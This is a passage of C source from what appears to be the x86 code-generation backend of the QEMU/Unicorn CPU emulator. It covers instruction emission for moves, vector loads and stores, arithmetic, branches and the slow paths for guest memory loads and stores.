tcg_out_vex_modrm_offset(s, OPC_MOVDDUP, r, 0, base, offset); break; case MO_32: tcg_out_vex_modrm_offset(s, OPC_VBROADCASTSS, r, 0, base, offset); break; case MO_16: tcg_out_vex_modrm_offset(s, OPC_VPINSRW, r, r, base, offset); tcg_out8(s, 0); /* imm8 */ tcg_out_dup_vec(s, type, vece, r, r); break; case MO_8: tcg_out_vex_modrm_offset(s, OPC_VPINSRB, r, r, base, offset); tcg_out8(s, 0); /* imm8 */ tcg_out_dup_vec(s, type, vece, r, r); break; default: g_assert_not_reached(); } } return true; } static void tcg_out_dupi_vec(TCGContext *s, TCGType type, TCGReg ret, tcg_target_long arg) { int vex_l = (type == TCG_TYPE_V256 ? P_VEXL : 0); if (arg == 0) { tcg_out_vex_modrm(s, OPC_PXOR, ret, ret, ret); return; } if (arg == -1) { tcg_out_vex_modrm(s, OPC_PCMPEQB + vex_l, ret, ret, ret); return; } if (TCG_TARGET_REG_BITS == 64) { if (type == TCG_TYPE_V64) { tcg_out_vex_modrm_pool(s, OPC_MOVQ_VqWq, ret); } else if (have_avx2) { tcg_out_vex_modrm_pool(s, OPC_VPBROADCASTQ + vex_l, ret); } else { tcg_out_vex_modrm_pool(s, OPC_MOVDDUP, ret); } new_pool_label(s, arg, R_386_PC32, s->code_ptr - 4, -4); } else { if (have_avx2) { tcg_out_vex_modrm_pool(s, OPC_VPBROADCASTW + vex_l, ret); } else { tcg_out_vex_modrm_pool(s, OPC_VBROADCASTSS, ret); } new_pool_label(s, arg, R_386_32, s->code_ptr - 4, 0); } } static void tcg_out_movi(TCGContext *s, TCGType type, TCGReg ret, tcg_target_long arg) { tcg_target_long diff; switch (type) { case TCG_TYPE_I32: #if TCG_TARGET_REG_BITS == 64 case TCG_TYPE_I64: #endif if (ret < 16) { break; } /* fallthru */ case TCG_TYPE_V64: case TCG_TYPE_V128: case TCG_TYPE_V256: tcg_debug_assert(ret >= 16); tcg_out_dupi_vec(s, type, ret, arg); return; default: g_assert_not_reached(); } if (arg == 0) { tgen_arithr(s, ARITH_XOR, ret, ret); return; } if (arg == (uint32_t)arg || type == TCG_TYPE_I32) { tcg_out_opc(s, OPC_MOVL_Iv + LOWREGMASK(ret), 0, ret, 0); tcg_out32(s, arg); return; } if (arg == (int32_t)arg) { tcg_out_modrm(s, OPC_MOVL_EvIz + P_REXW, 0, ret); tcg_out32(s, arg); return; } /* Try a 7 byte pc-relative lea before the 10 byte movq. */ diff = arg - ((uintptr_t)s->code_ptr + 7); if (diff == (int32_t)diff) { tcg_out_opc(s, OPC_LEA | P_REXW, ret, 0, 0); tcg_out8(s, (LOWREGMASK(ret) << 3) | 5); tcg_out32(s, diff); return; } tcg_out_opc(s, OPC_MOVL_Iv + P_REXW + LOWREGMASK(ret), 0, ret, 0); tcg_out64(s, arg); } static inline void tcg_out_pushi(TCGContext *s, tcg_target_long val) { if (val == (int8_t)val) { tcg_out_opc(s, OPC_PUSH_Ib, 0, 0, 0); tcg_out8(s, val); } else if (val == (int32_t)val) { tcg_out_opc(s, OPC_PUSH_Iv, 0, 0, 0); tcg_out32(s, val); } else { tcg_abort(); } } static inline void tcg_out_mb(TCGContext *s, TCGArg a0) { /* Given the strength of x86 memory ordering, we only need care for store-load ordering. Experimentally, "lock orl $0,0(%esp)" is faster than "mfence", so don't bother with the sse insn. */ if (a0 & TCG_MO_ST_LD) { tcg_out8(s, 0xf0); tcg_out_modrm_offset(s, OPC_ARITH_EvIb, ARITH_OR, TCG_REG_ESP, 0); tcg_out8(s, 0); } } static inline void tcg_out_push(TCGContext *s, int reg) { tcg_out_opc(s, OPC_PUSH_r32 + LOWREGMASK(reg), 0, reg, 0); } static inline void tcg_out_pop(TCGContext *s, int reg) { tcg_out_opc(s, OPC_POP_r32 + LOWREGMASK(reg), 0, reg, 0); } static void tcg_out_ld(TCGContext *s, TCGType type, TCGReg ret, TCGReg arg1, intptr_t arg2) { switch (type) { case TCG_TYPE_I32: if (ret < 16) { tcg_out_modrm_offset(s, OPC_MOVL_GvEv, ret, arg1, arg2); } else { tcg_out_vex_modrm_offset(s, OPC_MOVD_VyEy, ret, 0, arg1, arg2); } break; case TCG_TYPE_I64: if (ret < 16) { tcg_out_modrm_offset(s, OPC_MOVL_GvEv | P_REXW, ret, arg1, arg2); break; } /* FALLTHRU */ case TCG_TYPE_V64: /* There is no instruction that can validate 8-byte alignment. */ tcg_debug_assert(ret >= 16); tcg_out_vex_modrm_offset(s, OPC_MOVQ_VqWq, ret, 0, arg1, arg2); break; case TCG_TYPE_V128: /* * The gvec infrastructure is asserts that v128 vector loads * and stores use a 16-byte aligned offset. Validate that the * final pointer is aligned by using an insn that will SIGSEGV. */ tcg_debug_assert(ret >= 16); tcg_out_vex_modrm_offset(s, OPC_MOVDQA_VxWx, ret, 0, arg1, arg2); break; case TCG_TYPE_V256: /* * The gvec infrastructure only requires 16-byte alignment, * so here we must use an unaligned load. */ tcg_debug_assert(ret >= 16); tcg_out_vex_modrm_offset(s, OPC_MOVDQU_VxWx | P_VEXL, ret, 0, arg1, arg2); break; default: g_assert_not_reached(); } } static void tcg_out_st(TCGContext *s, TCGType type, TCGReg arg, TCGReg arg1, intptr_t arg2) { switch (type) { case TCG_TYPE_I32: if (arg < 16) { tcg_out_modrm_offset(s, OPC_MOVL_EvGv, arg, arg1, arg2); } else { tcg_out_vex_modrm_offset(s, OPC_MOVD_EyVy, arg, 0, arg1, arg2); } break; case TCG_TYPE_I64: if (arg < 16) { tcg_out_modrm_offset(s, OPC_MOVL_EvGv | P_REXW, arg, arg1, arg2); break; } /* FALLTHRU */ case TCG_TYPE_V64: /* There is no instruction that can validate 8-byte alignment. */ tcg_debug_assert(arg >= 16); tcg_out_vex_modrm_offset(s, OPC_MOVQ_WqVq, arg, 0, arg1, arg2); break; case TCG_TYPE_V128: /* * The gvec infrastructure is asserts that v128 vector loads * and stores use a 16-byte aligned offset. Validate that the * final pointer is aligned by using an insn that will SIGSEGV. */ tcg_debug_assert(arg >= 16); tcg_out_vex_modrm_offset(s, OPC_MOVDQA_WxVx, arg, 0, arg1, arg2); break; case TCG_TYPE_V256: /* * The gvec infrastructure only requires 16-byte alignment, * so here we must use an unaligned store. */ tcg_debug_assert(arg >= 16); tcg_out_vex_modrm_offset(s, OPC_MOVDQU_WxVx | P_VEXL, arg, 0, arg1, arg2); break; default: g_assert_not_reached(); } } static bool tcg_out_sti(TCGContext *s, TCGType type, TCGArg val, TCGReg base, intptr_t ofs) { int rexw = 0; if (TCG_TARGET_REG_BITS == 64 && type == TCG_TYPE_I64) { if (val != (int32_t)val) { return false; } rexw = P_REXW; } else if (type != TCG_TYPE_I32) { return false; } tcg_out_modrm_offset(s, OPC_MOVL_EvIz | rexw, 0, base, ofs); tcg_out32(s, val); return true; } static void tcg_out_shifti(TCGContext *s, int subopc, int reg, int count) { /* Propagate an opcode prefix, such as P_DATA16. */ int ext = subopc & ~0x7; subopc &= 0x7; if (count == 1) { tcg_out_modrm(s, OPC_SHIFT_1 + ext, subopc, reg); } else { tcg_out_modrm(s, OPC_SHIFT_Ib + ext, subopc, reg); tcg_out8(s, count); } } static inline void tcg_out_bswap32(TCGContext *s, int reg) { tcg_out_opc(s, OPC_BSWAP + LOWREGMASK(reg), 0, reg, 0); } static inline void tcg_out_rolw_8(TCGContext *s, int reg) { tcg_out_shifti(s, SHIFT_ROL + P_DATA16, reg, 8); } static inline void tcg_out_ext8u(TCGContext *s, int dest, int src) { /* movzbl */ tcg_debug_assert(src < 4 || TCG_TARGET_REG_BITS == 64); tcg_out_modrm(s, OPC_MOVZBL + P_REXB_RM, dest, src); } static void tcg_out_ext8s(TCGContext *s, int dest, int src, int rexw) { /* movsbl */ tcg_debug_assert(src < 4 || TCG_TARGET_REG_BITS == 64); tcg_out_modrm(s, OPC_MOVSBL + P_REXB_RM + rexw, dest, src); } static inline void tcg_out_ext16u(TCGContext *s, int dest, int src) { /* movzwl */ tcg_out_modrm(s, OPC_MOVZWL, dest, src); } static inline void tcg_out_ext16s(TCGContext *s, int dest, int src, int rexw) { /* movsw[lq] */ tcg_out_modrm(s, OPC_MOVSWL + rexw, dest, src); } static inline void tcg_out_ext32u(TCGContext *s, int dest, int src) { /* 32-bit mov zero extends. */ tcg_out_modrm(s, OPC_MOVL_GvEv, dest, src); } static inline void tcg_out_ext32s(TCGContext *s, int dest, int src) { tcg_out_modrm(s, OPC_MOVSLQ, dest, src); } static inline void tcg_out_bswap64(TCGContext *s, int reg) { tcg_out_opc(s, OPC_BSWAP + P_REXW + LOWREGMASK(reg), 0, reg, 0); } static void tgen_arithi(TCGContext *s, int c, int r0, tcg_target_long val, int cf) { int rexw = 0; if (TCG_TARGET_REG_BITS == 64) { rexw = c & -8; c &= 7; } /* ??? While INC is 2 bytes shorter than ADDL $1, they also induce partial flags update stalls on Pentium4 and are not recommended by current Intel optimization manuals. */ if (!cf && (c == ARITH_ADD || c == ARITH_SUB) && (val == 1 || val == -1)) { int is_inc = (c == ARITH_ADD) ^ (val < 0); if (TCG_TARGET_REG_BITS == 64) { /* The single-byte increment encodings are re-tasked as the REX prefixes. Use the MODRM encoding. */ tcg_out_modrm(s, OPC_GRP5 + rexw, (is_inc ? EXT5_INC_Ev : EXT5_DEC_Ev), r0); } else { tcg_out8(s, (is_inc ? OPC_INC_r32 : OPC_DEC_r32) + r0); } return; } if (c == ARITH_AND) { if (TCG_TARGET_REG_BITS == 64) { if (val == 0xffffffffu) { tcg_out_ext32u(s, r0, r0); return; } if (val == (uint32_t)val) { /* AND with no high bits set can use a 32-bit operation. */ rexw = 0; } } if (val == 0xffu && (r0 < 4 || TCG_TARGET_REG_BITS == 64)) { tcg_out_ext8u(s, r0, r0); return; } if (val == 0xffffu) { tcg_out_ext16u(s, r0, r0); return; } } if (val == (int8_t)val) { tcg_out_modrm(s, OPC_ARITH_EvIb + rexw, c, r0); tcg_out8(s, val); return; } if (rexw == 0 || val == (int32_t)val) { tcg_out_modrm(s, OPC_ARITH_EvIz + rexw, c, r0); tcg_out32(s, val); return; } tcg_abort(); } static void tcg_out_addi(TCGContext *s, int reg, tcg_target_long val) { if (val != 0) { tgen_arithi(s, ARITH_ADD + P_REXW, reg, val, 0); } } /* Use SMALL != 0 to force a short forward branch. */ static void tcg_out_jxx(TCGContext *s, int opc, TCGLabel *l, int _small) { int32_t val, val1; if (l->has_value) { val = tcg_pcrel_diff(s, l->u.value_ptr); val1 = val - 2; if ((int8_t)val1 == val1) { if (opc == -1) { tcg_out8(s, OPC_JMP_short); } else { tcg_out8(s, OPC_JCC_short + opc); } tcg_out8(s, val1); } else { if (_small) { tcg_abort(); } if (opc == -1) { tcg_out8(s, OPC_JMP_long); tcg_out32(s, val - 5); } else { tcg_out_opc(s, OPC_JCC_long + opc, 0, 0, 0); tcg_out32(s, val - 6); } } } else if (_small) { if (opc == -1) { tcg_out8(s, OPC_JMP_short); } else { tcg_out8(s, OPC_JCC_short + opc); } tcg_out_reloc(s, s->code_ptr, R_386_PC8, l, -1); s->code_ptr += 1; } else { if (opc == -1) { tcg_out8(s, OPC_JMP_long); } else { tcg_out_opc(s, OPC_JCC_long + opc, 0, 0, 0); } tcg_out_reloc(s, s->code_ptr, R_386_PC32, l, -4); s->code_ptr += 4; } } static void tcg_out_cmp(TCGContext *s, TCGArg arg1, TCGArg arg2, int const_arg2, int rexw) { if (const_arg2) { if (arg2 == 0) { /* test r, r */ tcg_out_modrm(s, OPC_TESTL + rexw, arg1, arg1); } else { tgen_arithi(s, ARITH_CMP + rexw, arg1, arg2, 0); } } else { tgen_arithr(s, ARITH_CMP + rexw, arg1, arg2); } } static void tcg_out_brcond32(TCGContext *s, TCGCond cond, TCGArg arg1, TCGArg arg2, int const_arg2, TCGLabel *label, int _small) { tcg_out_cmp(s, arg1, arg2, const_arg2, 0); tcg_out_jxx(s, tcg_cond_to_jcc[cond], label, _small); } #if TCG_TARGET_REG_BITS == 64 static void tcg_out_brcond64(TCGContext *s, TCGCond cond, TCGArg arg1, TCGArg arg2, int const_arg2, TCGLabel *label, int _small) { tcg_out_cmp(s, arg1, arg2, const_arg2, P_REXW); tcg_out_jxx(s, tcg_cond_to_jcc[cond], label, _small); } #else /* XXX: we implement it at the target level to avoid having to handle cross basic blocks temporaries */ static void tcg_out_brcond2(TCGContext *s, const TCGArg *args, const int *const_args, int _small) { TCGLabel *label_next = gen_new_label(s); TCGLabel *label_this = arg_label(args[5]); switch(args[4]) { case TCG_COND_EQ: tcg_out_brcond32(s, TCG_COND_NE, args[0], args[2], const_args[2], label_next, 1); tcg_out_brcond32(s, TCG_COND_EQ, args[1], args[3], const_args[3], label_this, _small); break; case TCG_COND_NE: tcg_out_brcond32(s, TCG_COND_NE, args[0], args[2], const_args[2], label_this, _small); tcg_out_brcond32(s, TCG_COND_NE, args[1], args[3], const_args[3], label_this, _small); break; case TCG_COND_LT: tcg_out_brcond32(s, TCG_COND_LT, args[1], args[3], const_args[3], label_this, _small); tcg_out_jxx(s, JCC_JNE, label_next, 1); tcg_out_brcond32(s, TCG_COND_LTU, args[0], args[2], const_args[2], label_this, _small); break; case TCG_COND_LE: tcg_out_brcond32(s, TCG_COND_LT, args[1], args[3], const_args[3], label_this, _small); tcg_out_jxx(s, JCC_JNE, label_next, 1); tcg_out_brcond32(s, TCG_COND_LEU, args[0], args[2], const_args[2], label_this, _small); break; case TCG_COND_GT: tcg_out_brcond32(s, TCG_COND_GT, args[1], args[3], const_args[3], label_this, _small); tcg_out_jxx(s, JCC_JNE, label_next, 1); tcg_out_brcond32(s, TCG_COND_GTU, args[0], args[2], const_args[2], label_this, _small); break; case TCG_COND_GE: tcg_out_brcond32(s, TCG_COND_GT, args[1], args[3], const_args[3], label_this, _small); tcg_out_jxx(s, JCC_JNE, label_next, 1); tcg_out_brcond32(s, TCG_COND_GEU, args[0], args[2], const_args[2], label_this, _small); break; case TCG_COND_LTU: tcg_out_brcond32(s, TCG_COND_LTU, args[1], args[3], const_args[3], label_this, _small); tcg_out_jxx(s, JCC_JNE, label_next, 1); tcg_out_brcond32(s, TCG_COND_LTU, args[0], args[2], const_args[2], label_this, _small); break; case TCG_COND_LEU: tcg_out_brcond32(s, TCG_COND_LTU, args[1], args[3], const_args[3], label_this, _small); tcg_out_jxx(s, JCC_JNE, label_next, 1); tcg_out_brcond32(s, TCG_COND_LEU, args[0], args[2], const_args[2], label_this, _small); break; case TCG_COND_GTU: tcg_out_brcond32(s, TCG_COND_GTU, args[1], args[3], const_args[3], label_this, _small); tcg_out_jxx(s, JCC_JNE, label_next, 1); tcg_out_brcond32(s, TCG_COND_GTU, args[0], args[2], const_args[2], label_this, _small); break; case TCG_COND_GEU: tcg_out_brcond32(s, TCG_COND_GTU, args[1], args[3], const_args[3], label_this, _small); tcg_out_jxx(s, JCC_JNE, label_next, 1); tcg_out_brcond32(s, TCG_COND_GEU, args[0], args[2], const_args[2], label_this, _small); break; default: tcg_abort(); } tcg_out_label(s, label_next, s->code_ptr); } #endif static void tcg_out_setcond32(TCGContext *s, TCGCond cond, TCGArg dest, TCGArg arg1, TCGArg arg2, int const_arg2) { tcg_out_cmp(s, arg1, arg2, const_arg2, 0); tcg_out_modrm(s, OPC_SETCC | tcg_cond_to_jcc[cond], 0, dest); tcg_out_ext8u(s, dest, dest); } #if TCG_TARGET_REG_BITS == 64 static void tcg_out_setcond64(TCGContext *s, TCGCond cond, TCGArg dest, TCGArg arg1, TCGArg arg2, int const_arg2) { tcg_out_cmp(s, arg1, arg2, const_arg2, P_REXW); tcg_out_modrm(s, OPC_SETCC | tcg_cond_to_jcc[cond], 0, dest); tcg_out_ext8u(s, dest, dest); } #else static void tcg_out_setcond2(TCGContext *s, const TCGArg *args, const int *const_args) { TCGArg new_args[6]; TCGLabel *label_true, *label_over; memcpy(new_args, args+1, 5*sizeof(TCGArg)); if (args[0] == args[1] || args[0] == args[2] || (!const_args[3] && args[0] == args[3]) || (!const_args[4] && args[0] == args[4])) { /* When the destination overlaps with one of the argument registers, don't do anything tricky. */ label_true = gen_new_label(s); label_over = gen_new_label(s); new_args[5] = label_arg(label_true); tcg_out_brcond2(s, new_args, const_args+1, 1); tcg_out_movi(s, TCG_TYPE_I32, args[0], 0); tcg_out_jxx(s, JCC_JMP, label_over, 1); tcg_out_label(s, label_true, s->code_ptr); tcg_out_movi(s, TCG_TYPE_I32, args[0], 1); tcg_out_label(s, label_over, s->code_ptr); } else { /* When the destination does not overlap one of the arguments, clear the destination first, jump if cond false, and emit an increment in the true case. This results in smaller code. */ tcg_out_movi(s, TCG_TYPE_I32, args[0], 0); label_over = gen_new_label(s); new_args[4] = tcg_invert_cond(new_args[4]); new_args[5] = label_arg(label_over); tcg_out_brcond2(s, new_args, const_args+1, 1); tgen_arithi(s, ARITH_ADD, args[0], 1, 0); tcg_out_label(s, label_over, s->code_ptr); } } #endif static void tcg_out_cmov(TCGContext *s, TCGCond cond, int rexw, TCGReg dest, TCGReg v1) { if (have_cmov) { tcg_out_modrm(s, OPC_CMOVCC | tcg_cond_to_jcc[cond] | rexw, dest, v1); } else { TCGLabel *over = gen_new_label(s); tcg_out_jxx(s, tcg_cond_to_jcc[tcg_invert_cond(cond)], over, 1); tcg_out_mov(s, TCG_TYPE_I32, dest, v1); tcg_out_label(s, over, s->code_ptr); } } static void tcg_out_movcond32(TCGContext *s, TCGCond cond, TCGReg dest, TCGReg c1, TCGArg c2, int const_c2, TCGReg v1) { tcg_out_cmp(s, c1, c2, const_c2, 0); tcg_out_cmov(s, cond, 0, dest, v1); } #if TCG_TARGET_REG_BITS == 64 static void tcg_out_movcond64(TCGContext *s, TCGCond cond, TCGReg dest, TCGReg c1, TCGArg c2, int const_c2, TCGReg v1) { tcg_out_cmp(s, c1, c2, const_c2, P_REXW); tcg_out_cmov(s, cond, P_REXW, dest, v1); } #endif static void tcg_out_ctz(TCGContext *s, int rexw, TCGReg dest, TCGReg arg1, TCGArg arg2, bool const_a2) { if (have_bmi1) { tcg_out_modrm(s, OPC_TZCNT + rexw, dest, arg1); if (const_a2) { tcg_debug_assert(arg2 == (rexw ? 64 : 32)); } else { tcg_debug_assert(dest != arg2); tcg_out_cmov(s, TCG_COND_LTU, rexw, dest, arg2); } } else { tcg_debug_assert(dest != arg2); tcg_out_modrm(s, OPC_BSF + rexw, dest, arg1); tcg_out_cmov(s, TCG_COND_EQ, rexw, dest, arg2); } } static void tcg_out_clz(TCGContext *s, int rexw, TCGReg dest, TCGReg arg1, TCGArg arg2, bool const_a2) { if (have_lzcnt) { tcg_out_modrm(s, OPC_LZCNT + rexw, dest, arg1); if (const_a2) { tcg_debug_assert(arg2 == (rexw ? 64 : 32)); } else { tcg_debug_assert(dest != arg2); tcg_out_cmov(s, TCG_COND_LTU, rexw, dest, arg2); } } else { tcg_debug_assert(!const_a2); tcg_debug_assert(dest != arg1); tcg_debug_assert(dest != arg2); /* Recall that the output of BSR is the index not the count. */ tcg_out_modrm(s, OPC_BSR + rexw, dest, arg1); tgen_arithi(s, ARITH_XOR + rexw, dest, rexw ? 63 : 31, 0); /* Since we have destroyed the flags from BSR, we have to re-test. */ tcg_out_cmp(s, arg1, 0, 1, rexw); tcg_out_cmov(s, TCG_COND_EQ, rexw, dest, arg2); } } static void tcg_out_branch(TCGContext *s, int call, tcg_insn_unit *dest) { intptr_t disp = tcg_pcrel_diff(s, dest) - 5; if (disp == (int32_t)disp) { tcg_out_opc(s, call ? OPC_CALL_Jz : OPC_JMP_long, 0, 0, 0); tcg_out32(s, disp); } else { /* rip-relative addressing into the constant pool. This is 6 + 8 = 14 bytes, as compared to using an an immediate load 10 + 6 = 16 bytes, plus we may be able to re-use the pool constant for more calls. */ tcg_out_opc(s, OPC_GRP5, 0, 0, 0); tcg_out8(s, (call ? EXT5_CALLN_Ev : EXT5_JMPN_Ev) << 3 | 5); new_pool_label(s, (uintptr_t)dest, R_386_PC32, s->code_ptr, -4); tcg_out32(s, 0); } } static inline void tcg_out_call(TCGContext *s, tcg_insn_unit *dest) { tcg_out_branch(s, 1, dest); } static void tcg_out_jmp(TCGContext *s, tcg_insn_unit *dest) { tcg_out_branch(s, 0, dest); } static void tcg_out_nopn(TCGContext *s, int n) { int i; /* Emit 1 or 2 operand size prefixes for the standard one byte nop, * "xchg %eax,%eax", forming "xchg %ax,%ax". All cores accept the * duplicate prefix, and all of the interesting recent cores can * decode and discard the duplicates in a single cycle. */ tcg_debug_assert(n >= 1); for (i = 1; i < n; ++i) { tcg_out8(s, 0x66); } tcg_out8(s, 0x90); } #include "../tcg-ldst.inc.c" /* helper signature: helper_ret_ld_mmu(CPUState *env, target_ulong addr, * int mmu_idx, uintptr_t ra) */ static void * const qemu_ld_helpers[16] = { [MO_UB] = helper_ret_ldub_mmu, [MO_LEUW] = helper_le_lduw_mmu, [MO_LEUL] = helper_le_ldul_mmu, [MO_LEQ] = helper_le_ldq_mmu, [MO_BEUW] = helper_be_lduw_mmu, [MO_BEUL] = helper_be_ldul_mmu, [MO_BEQ] = helper_be_ldq_mmu, }; /* helper signature: helper_ret_st_mmu(CPUState *env, target_ulong addr, * uintxx_t val, int mmu_idx, uintptr_t ra) */ static void * const qemu_st_helpers[16] = { [MO_UB] = helper_ret_stb_mmu, [MO_LEUW] = helper_le_stw_mmu, [MO_LEUL] = helper_le_stl_mmu, [MO_LEQ] = helper_le_stq_mmu, [MO_BEUW] = helper_be_stw_mmu, [MO_BEUL] = helper_be_stl_mmu, [MO_BEQ] = helper_be_stq_mmu, }; /* Perform the TLB load and compare. Inputs: ADDRLO and ADDRHI contain the low and high part of the address. MEM_INDEX and S_BITS are the memory context and log2 size of the load. WHICH is the offset into the CPUTLBEntry structure of the slot to read. This should be offsetof addr_read or addr_write. Outputs: LABEL_PTRS is filled with 1 (32-bit addresses) or 2 (64-bit addresses) positions of the displacements of forward jumps to the TLB miss case. Second argument register is loaded with the low part of the address. In the TLB hit case, it has been adjusted as indicated by the TLB and so is a host address. In the TLB miss case, it continues to hold a guest address. First argument register is clobbered. */ static inline void tcg_out_tlb_load(TCGContext *s, TCGReg addrlo, TCGReg addrhi, int mem_index, MemOp opc, tcg_insn_unit **label_ptr, int which) { #ifdef TARGET_ARM struct uc_struct *uc = s->uc; #endif const TCGReg r0 = TCG_REG_L0; const TCGReg r1 = TCG_REG_L1; TCGType ttype = TCG_TYPE_I32; TCGType tlbtype = TCG_TYPE_I32; int trexw = 0, hrexw = 0, tlbrexw = 0; unsigned a_bits = get_alignment_bits(opc); unsigned s_bits = opc & MO_SIZE; unsigned a_mask = (1 << a_bits) - 1; unsigned s_mask = (1 << s_bits) - 1; target_ulong tlb_mask; if (TCG_TARGET_REG_BITS == 64) { if (TARGET_LONG_BITS == 64) { ttype = TCG_TYPE_I64; trexw = P_REXW; } if (TCG_TYPE_PTR == TCG_TYPE_I64) { hrexw = P_REXW; if (TARGET_PAGE_BITS + CPU_TLB_DYN_MAX_BITS > 32) { tlbtype = TCG_TYPE_I64; tlbrexw = P_REXW; } } } tcg_out_mov(s, tlbtype, r0, addrlo); tcg_out_shifti(s, SHIFT_SHR + tlbrexw, r0, TARGET_PAGE_BITS - CPU_TLB_ENTRY_BITS); tcg_out_modrm_offset(s, OPC_AND_GvEv + trexw, r0, TCG_AREG0, TLB_MASK_TABLE_OFS(mem_index) + offsetof(CPUTLBDescFast, mask)); tcg_out_modrm_offset(s, OPC_ADD_GvEv + hrexw, r0, TCG_AREG0, TLB_MASK_TABLE_OFS(mem_index) + offsetof(CPUTLBDescFast, table)); /* If the required alignment is at least as large as the access, simply copy the address and mask. For lesser alignments, check that we don't cross pages for the complete access. */ if (a_bits >= s_bits) { tcg_out_mov(s, ttype, r1, addrlo); } else { tcg_out_modrm_offset(s, OPC_LEA + trexw, r1, addrlo, s_mask - a_mask); } tlb_mask = (target_ulong)TARGET_PAGE_MASK | a_mask; tgen_arithi(s, ARITH_AND + trexw, r1, tlb_mask, 0); /* cmp 0(r0), r1 */ tcg_out_modrm_offset(s, OPC_CMP_GvEv + trexw, r1, r0, which); /* Prepare for both the fast path add of the tlb addend, and the slow path function argument setup. */ tcg_out_mov(s, ttype, r1, addrlo); // Unicorn: fast path if hookmem is not enable if (!HOOK_EXISTS(s->uc, UC_HOOK_MEM_READ) && !HOOK_EXISTS(s->uc, UC_HOOK_MEM_WRITE)) tcg_out_opc(s, OPC_JCC_long + JCC_JNE, 0, 0, 0); else /* slow_path, so data access will go via load_helper() */ tcg_out_opc(s, OPC_JMP_long, 0, 0, 0); label_ptr[0] = s->code_ptr; s->code_ptr += 4; if (TARGET_LONG_BITS > TCG_TARGET_REG_BITS) { /* cmp 4(r0), addrhi */ tcg_out_modrm_offset(s, OPC_CMP_GvEv, addrhi, r0, which + 4); /* jne slow_path */ tcg_out_opc(s, OPC_JCC_long + JCC_JNE, 0, 0, 0); label_ptr[1] = s->code_ptr; s->code_ptr += 4; } /* TLB Hit. */ /* add addend(r0), r1 */ tcg_out_modrm_offset(s, OPC_ADD_GvEv + hrexw, r1, r0, offsetof(CPUTLBEntry, addend)); } /* * Record the context of a call to the out of line helper code for the slow path * for a load or store, so that we can later generate the correct helper code */ static void add_qemu_ldst_label(TCGContext *s, bool is_ld, bool is_64, TCGMemOpIdx oi, TCGReg datalo, TCGReg datahi, TCGReg addrlo, TCGReg addrhi, tcg_insn_unit *raddr, tcg_insn_unit **label_ptr) { TCGLabelQemuLdst *label = new_ldst_label(s); label->is_ld = is_ld; label->oi = oi; label->type = is_64 ? TCG_TYPE_I64 : TCG_TYPE_I32; label->datalo_reg = datalo; label->datahi_reg = datahi; label->addrlo_reg = addrlo; label->addrhi_reg = addrhi; label->raddr = raddr; label->label_ptr[0] = label_ptr[0]; if (TARGET_LONG_BITS > TCG_TARGET_REG_BITS) { label->label_ptr[1] = label_ptr[1]; } } /* * Generate code for the slow path for a load at the end of block */ static bool tcg_out_qemu_ld_slow_path(TCGContext *s, TCGLabelQemuLdst *l) { TCGMemOpIdx oi = l->oi; MemOp opc = get_memop(oi); TCGReg data_reg; tcg_insn_unit **label_ptr = &l->label_ptr[0]; int rexw = (l->type == TCG_TYPE_I64 ? P_REXW : 0); /* resolve label address */ tcg_patch32(label_ptr[0], s->code_ptr - label_ptr[0] - 4); if (TARGET_LONG_BITS > TCG_TARGET_REG_BITS) { tcg_patch32(label_ptr[1], s->code_ptr - label_ptr[1] - 4); } if (TCG_TARGET_REG_BITS == 32) { int ofs = 0; tcg_out_st(s, TCG_TYPE_PTR, TCG_AREG0, TCG_REG_ESP, ofs); ofs += 4; tcg_out_st(s, TCG_TYPE_I32, l->addrlo_reg, TCG_REG_ESP, ofs); ofs += 4; if (TARGET_LONG_BITS == 64) { tcg_out_st(s, TCG_TYPE_I32, l->addrhi_reg, TCG_REG_ESP, ofs); ofs += 4; } tcg_out_sti(s, TCG_TYPE_I32, oi, TCG_REG_ESP, ofs); ofs += 4; tcg_out_sti(s, TCG_TYPE_PTR, (uintptr_t)l->raddr, TCG_REG_ESP, ofs); } else { tcg_out_mov(s, TCG_TYPE_PTR, tcg_target_call_iarg_regs[0], TCG_AREG0); /* The second argument is already loaded with addrlo. */ tcg_out_movi(s, TCG_TYPE_I32, tcg_target_call_iarg_regs[2], oi); tcg_out_movi(s, TCG_TYPE_PTR, tcg_target_call_iarg_regs[3], (uintptr_t)l->raddr); } tcg_out_call(s, qemu_ld_helpers[opc & (MO_BSWAP | MO_SIZE)]); data_reg = l->datalo_reg; switch (opc & MO_SSIZE) { case MO_SB: tcg_out_ext8s(s, data_reg, TCG_REG_EAX, rexw); break; case MO_SW: tcg_out_ext16s(s, data_reg, TCG_REG_EAX, rexw); break; #if TCG_TARGET_REG_BITS == 64 case MO_SL: tcg_out_ext32s(s, data_reg, TCG_REG_EAX); break; #endif case MO_UB: case MO_UW: /* Note that the helpers have zero-extended to tcg_target_long. */ case MO_UL: tcg_out_mov(s, TCG_TYPE_I32, data_reg, TCG_REG_EAX); break; case MO_Q: if (TCG_TARGET_REG_BITS == 64) { tcg_out_mov(s, TCG_TYPE_I64, data_reg, TCG_REG_RAX); } else if (data_reg == TCG_REG_EDX) { /* xchg %edx, %eax */ tcg_out_opc(s, OPC_XCHG_ax_r32 + TCG_REG_EDX, 0, 0, 0); tcg_out_mov(s, TCG_TYPE_I32, l->datahi_reg, TCG_REG_EAX); } else { tcg_out_mov(s, TCG_TYPE_I32, data_reg, TCG_REG_EAX); tcg_out_mov(s, TCG_TYPE_I32, l->datahi_reg, TCG_REG_EDX); } break; default: tcg_abort(); } /* Jump to the code corresponding to next IR of qemu_st */ tcg_out_jmp(s, l->raddr); return true; } /* * Generate code for the slow path for a store at the end of block */ static bool tcg_out_qemu_st_slow_path(TCGContext *s, TCGLabelQemuLdst *l) { TCGMemOpIdx oi = l->oi; MemOp opc = get_memop(oi); MemOp s_bits = opc & MO_SIZE; tcg_insn_unit **label_ptr = &l->label_ptr[0]; TCGReg retaddr; /* resolve label address */ tcg_patch32(label_ptr[0], s->code_ptr - label_ptr[0] - 4); if (TARGET_LONG_BITS > TCG_TARGET_REG_BITS) { tcg_patch32(label_ptr[1], s->code_ptr - label_ptr[1] - 4); } if (TCG_TARGET_REG_BITS == 32) { int ofs = 0; tcg_out_st(s, TCG_TYPE_PTR, TCG_AREG0, TCG_REG_ESP, ofs); ofs += 4; tcg_out_st(s, TCG_TYPE_I32, l->addrlo_reg, TCG_REG_ESP, ofs); ofs += 4; if (TARGET_LONG_BITS == 64) { tcg_out_st(s, TCG_TYPE_I32, l->addrhi_reg, TCG_REG_ESP, ofs); ofs += 4; } tcg_out_st(s, TCG_TYPE_I32, l->datalo_reg, TCG_REG_ESP, ofs); ofs += 4; if (s_bits == MO_64) { 